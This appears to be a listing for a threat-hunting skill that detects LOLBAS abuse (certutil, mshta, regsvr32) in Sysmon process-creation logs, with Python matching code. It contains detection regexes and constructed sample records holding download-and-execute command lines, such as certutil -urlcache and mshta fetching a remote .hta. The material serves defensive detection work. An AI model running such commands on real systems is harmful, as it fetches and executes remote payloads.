Detects Living Off The Land Binaries (LOLBAS) abuse like certutil, wmic, mshta in Windows event logs and Sysmon via process creation event matching against LOLBAS database. For threat hunting and SIEM rules.
npx claudepluginhub killvxk/cybersecurity-skills-zh
This skill uses the workspace's default tool permissions.
Detects LOLBAS abuse by analyzing Windows process creation events (Event ID 4688 / Sysmon Event ID 1) and matching the command line against the known malicious patterns documented by the LOLBAS project.
Detects LOLBin/LOLBAS abuse including certutil, regsvr32, mshta, rundll32 via Sysmon telemetry, Sigma rules, and parent-child process analysis for threat hunting.
Detects LOLBin abuse in Windows via Sysmon process monitoring, command-line analysis, and process relationships. Builds SIEM rules, hunts fileless attacks, and tunes configurations.
Analyzes endpoint process creation logs to hunt for adversary abuse of Living Off the Land Binaries (LOLBins) like certutil, mshta, rundll32 via suspicious execution patterns. Useful for threat hunting and MITRE T1218 detection.
import requests

# Fetch the LOLBAS database (published by the LOLBAS project as JSON)
resp = requests.get("https://lolbas-project.github.io/api/lolbas.json", timeout=30)
resp.raise_for_status()
lolbas_db = resp.json()

# Extract each binary's name and its documented suspicious command lines
for entry in lolbas_db:
    print(entry["Name"], [cmd["Command"] for cmd in entry.get("Commands", [])])
Key detection pattern:
# Match Sysmon Event ID 1 records against LOLBAS patterns (requires the python-evtx package)
import Evtx.Evtx as evtx

with evtx.Evtx("Microsoft-Windows-Sysmon.evtx") as log:
    for record in log.records():
        xml = record.xml()
        # Example pattern: certutil invoked with -urlcache (the LOLBAS download use case).
        # Note: this substring check runs over every record in the log, not only Event ID 1.
        if "certutil" in xml.lower() and "urlcache" in xml.lower():
            print(f"检测到 LOLBAS: {xml}")
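As an added example (not code from this skill or the LOLBAS project), the following parses Sysmon Event ID 1 XML records, compares the image name and command line against a small LOLBAS-style pattern table, and skips other event IDs; the pattern table, the sample records and the helper names are assumptions constructed for the demonstration.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed pattern table modelled on LOLBAS entries (an assumption, not the live lolbas.json):
# (binary name, regex over the command line, MITRE technique cited by the LOLBAS entry)
LOLBAS_PATTERNS = [
    ("certutil.exe", r"-urlcache\b.*\s-f\b|-decode\b", "T1105 / T1140"),
    ("mshta.exe", r"https?://|javascript:|vbscript:", "T1218.005"),
    ("regsvr32.exe", r"/i:https?://|scrobj\.dll", "T1218.010"),
]

def parse_sysmon_event(xml_text):
    """Pull EventID, Image, CommandLine and ParentImage out of one Sysmon XML record."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, data.get("Image", ""), data.get("CommandLine", ""), data.get("ParentImage", "")

def match_lolbas(image, command_line):
    """Return (binary, technique) pairs whose pattern matches this process creation."""
    exe = image.lower().rsplit("\\", 1)[-1]  # compare the image file name, not the full path
    return [(b, t) for b, pat, t in LOLBAS_PATTERNS
            if exe == b and re.search(pat, command_line, re.IGNORECASE)]

def hunt(records):
    """Run every Sysmon Event ID 1 record through the matcher; other event IDs are skipped."""
    findings = []
    for xml_text in records:
        event_id, image, cmd, parent = parse_sysmon_event(xml_text)
        if event_id != 1:
            continue
        for binary, technique in match_lolbas(image, cmd):
            findings.append({"binary": binary, "technique": technique,
                             "parent": parent.rsplit("\\", 1)[-1], "cmd": cmd})
    return findings

def sysmon_record(event_id, image, cmd, parent):
    """Build a constructed Sysmon-style XML record (sample data, not real telemetry)."""
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System><EventData>'
            f'<Data Name="Image">{escape(image)}</Data><Data Name="CommandLine">{escape(cmd)}</Data>'
            f'<Data Name="ParentImage">{escape(parent)}</Data></EventData></Event>')

SAMPLE_RECORDS = [  # constructed: one download, one benign hash, one mshta launch, one non-process event
    sysmon_record(1, r"C:\Windows\System32\certutil.exe", "certutil -urlcache -split -f http://example.invalid/a.txt a.txt", r"C:\Windows\System32\cmd.exe"),
    sysmon_record(1, r"C:\Windows\System32\certutil.exe", "certutil -hashfile setup.msi SHA256", r"C:\Windows\explorer.exe"),
    sysmon_record(1, r"C:\Windows\System32\mshta.exe", "mshta http://example.invalid/p.hta", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    sysmon_record(3, r"C:\Windows\System32\certutil.exe", "certutil -urlcache -split -f http://example.invalid/a.txt", r"C:\Windows\System32\cmd.exe"),
]
```

Calling `hunt(SAMPLE_RECORDS)` yields two findings (the certutil download and the mshta launch from WINWORD.EXE); the benign hash and the Event ID 3 record are ignored. The parent image is carried along because it is usually the strongest triage signal for a LOLBin hit.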